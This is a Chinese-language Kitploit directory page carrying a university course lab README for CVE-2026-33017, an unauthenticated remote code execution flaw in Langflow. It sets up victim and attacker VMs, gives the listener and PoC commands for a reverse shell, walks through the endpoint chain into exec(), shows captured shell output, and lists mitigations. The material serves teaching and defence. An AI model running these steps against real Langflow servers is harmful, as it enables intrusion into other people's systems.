Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-33017 — 教育实验室,演示如何通过 CVE-2026-33017 在 Langflow 中实现未认证的远程代码执行(RCE),包含自动化虚拟机配置及用于反弹 Shell 的 PoC 漏洞利用。 | Kitploit
工具/GitHubGitHub/jorrit-vm/cve-2026-33017
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育红队远程访问工具Payload 开发实验室与实践
GitHubjorrit-vm/cve-2026-33017

CVE-2026-33017

教育实验室,演示如何通过 CVE-2026-33017 在 Langflow 中实现未认证的远程代码执行(RCE),包含自动化虚拟机配置及用于反弹 Shell 的 PoC 漏洞利用。

13个月前尚未审核
查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-33017 — Langflow 未认证远程代码执行

HoGent CyberSecurity II — 网络渗透测试与利用(NPE)
学年 2025–2026

CVE CVSS Langflow


概述

本仓库包含一个完整的实验环境及 CVE-2026-33017 的利用演示,这是 Langflow ≤ 1.8.1 中的一个严重未认证远程代码执行(RCE)漏洞。

攻击者无需任何认证即可通过 /api/v1/build_public_tmp/{flow_id}/flow 端点在服务器上执行任意 Python 代码,原因是用户输入被直接传递给 Python 的 exec(),且没有沙箱隔离或验证。

⚠️ 免责声明: 本仓库仅用于受控实验环境中的教育目的。请仅在获得明确授权的系统上使用。


架构

root@kitploit:~
┌─────────────────────────────────────────────────────┐
│                   主机                              │
│                                                     │
│  ┌──────────────────┐     ┌───────────────────────┐ │
│  │  Langflow-受害者  │     │    Kali-攻击者        │ │
│  │  Ubuntu 22.04    │     │    Kali Linux         │ │
│  │  192.168.56.101  │◄────│    192.168.56.100     │ │
│  │  Langflow 1.8.1  │     │    PoC 利用工具        │ │
│  │  端口 7860       │     │    + 互联网 (NAT)      │ │
│  └──────────────────┘     └───────────────────────┘ │
│         仅主机网络: 192.168.56.0/24                  │
└─────────────────────────────────────────────────────┘

仓库结构

root@kitploit:~
CVE-2026-33017/
├── README.md # 本文件
├── LICENSE
├── .gitignore
├── docs/
│ └── stappenplan.md # 完整部署与攻击指南
└── scripts/
├── setup_vms.sh # 阶段 1: 创建 VirtualBox 虚拟机(主机)
├── setup_victim.sh # 阶段 2: 安装 Langflow 1.8.1(Ubuntu 虚拟机)
└── setup_attacker.sh # 阶段 3: 安装 PoC 工具(Kali 虚拟机)

快速开始

前提条件

  • VirtualBox 7.x,且 VBoxManage 位于 PATH 中
  • Ubuntu_22.04-VB-64bit.vdi → 重命名为 ubuntu-22.04.vdi
  • Kali_Linux-VB-64bit.vdi → 重命名为 kali-linux.vdi
  • 两个 VDI 文件与 setup_vms.sh 位于同一目录

阶段 1 — 创建虚拟机(在主机上)

root@kitploit:~
bash scripts/setup_vms.sh

阶段 2 — 配置受害者虚拟机(在 Ubuntu 虚拟机上)

root@kitploit:~
# 登录凭据: osboxes / osboxes.org
sudo bash scripts/setup_victim.sh

阶段 3 — 配置攻击者虚拟机(在 Kali 虚拟机上)

root@kitploit:~
# 登录凭据: osboxes / osboxes.org
sudo bash scripts/setup_attacker.sh

执行攻击

终端 1 — 反向 Shell 监听器:

root@kitploit:~
nc -lvnp 4444

终端 2 — 利用:

root@kitploit:~
cd ~/CVE-2026-33017-Langflow-RCE-PoC
source venv/bin/activate
python3 cve-2026-33017.py 192.168.56.101 --shell \
  --lhost 192.168.56.100 --lport 4444

PoC 将由 setup_attacker.sh 自动安装。
使用的 PoC: omer-efe-curkus/CVE-2026-33017-Langflow-RCE-PoC


漏洞利用原理

步骤端点描述
1GET /api/v1/auto_login获取超级用户 JWT 令牌(AUTO_LOGIN=true)
2POST /api/v1/flows/通过 API 创建新的公共流程
3POST /api/v1/build_public_tmp/{id}/flow注入包含恶意 Python 代码的 CustomComponent
4exec() 位于 validate.py:397代码在无沙箱隔离的情况下执行 — RCE

执行证据

[] Fetching access token... [+] Public Flow ID created: 11571add-6416-4226-b8e6-844202cce6ff [] Sending reverse shell to connect back to 192.168.56.100:4444

Listener (Terminal 1): connect to [192.168.56.100] from (UNKNOWN) [192.168.56.101] 36160 $ whoami user $ hostname e37190a2f147 $ find /app -name "*.db" /app/.venv/lib/python3.12/site-packages/langflow/langflow.db


缓解措施

  • 升级到 Langflow ≥ 1.9.0 — 移除易受攻击的 data 参数
  • 在生产环境中禁用 LANGFLOW_AUTO_LOGIN
  • 通过防火墙限制对端口 7860 的网络访问
  • 将 Langflow 置于带认证的反向代理之后

参考资料

  • NVD — CVE-2026-33017
  • GitHub Advisory GHSA-vwmf-pq79-vjvx
  • Sysdig — 20 小时内被利用
  • SonicWall — 技术分析
  • PoC 作者 omer-efe-curkus

HoGent — 应用信息学 — CyberSecurity II — 2025–2026

下载工具